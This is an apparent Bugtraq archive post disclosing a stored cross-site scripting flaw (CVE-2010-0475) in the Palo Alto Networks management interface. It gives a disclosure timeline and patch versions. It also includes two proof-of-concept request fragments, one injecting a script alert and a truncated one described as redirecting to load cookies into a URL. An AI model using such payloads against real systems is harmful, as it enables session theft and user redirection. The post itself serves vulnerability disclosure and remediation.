Home page logo

bugtraq logo Bugtraq mailing list archives

Palo Alto Network Vulnerability - Cross-Site Scripting (XSS)
From: jeromie () comsecinc com
Date: 12 May 2010 16:34:26 -0000

Class:          Cross-Site Scripting (XSS) Vulnerability
CVE:    CVE-2010-0475
Remote: Yes 
Local:  Yes 
Published: May 11, 2010 08:30AM
Timeline:Submission to MITRE: 1/18/2010
Vendor Contact: 2/18/2010
Vendor Response:  2/18/2010
Patch Available:  5/2010  Patched in maintenance releases (3.1.1 & 3.0.9)
Credit: Jeromie Jackson CISSP, CISM
        COBIT & ITIL Certified
        President- San Diego Open Web Application Security Project (OWASP)
        Vice President- San Diego Information Audit & Control Association (ISACA)
        SANS Mentor
        LinkedIn: www.linkedin.com/in/securityassessment
        Blog: www.JeromieJackson.com
        Twitter: www.twitter.com/Security_Sifu
Validated Vulnerable:   
   Latest Version Per December 31, 2009


A Stored Cross-Site Scripting (XSS) vulnerability was found within the Palo Alto interface.  By crafting a URL that 
includes XSS code it is possible to inject malicious data, redirect the user to a bogus replica of the real website, or 
other nefarious activity.  

Single Line working-********&cpasswd=********&role=vsysadmin<SCRIPT>alert("0wn3d")</SCRIPT>


WORKING FOR REDIRECT TO LOAD cookies into URL.********&cpasswd=********&role=vsysadmin<SCRIPT/XSS

A patch will be required from the vendor.  It is recommended a routine to sanitize user input be consistently 
implemented throughout the application to mitigate other such occurrences within the application. 

OWASP Cross-Site Scripting (XSS) Attack Discussion
Rsnake's Cross-Site Scripting (XSS) Attack Cheat sheet

  By Date           By Thread  

Current thread:
  • Palo Alto Network Vulnerability - Cross-Site Scripting (XSS) jeromie (May 12)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]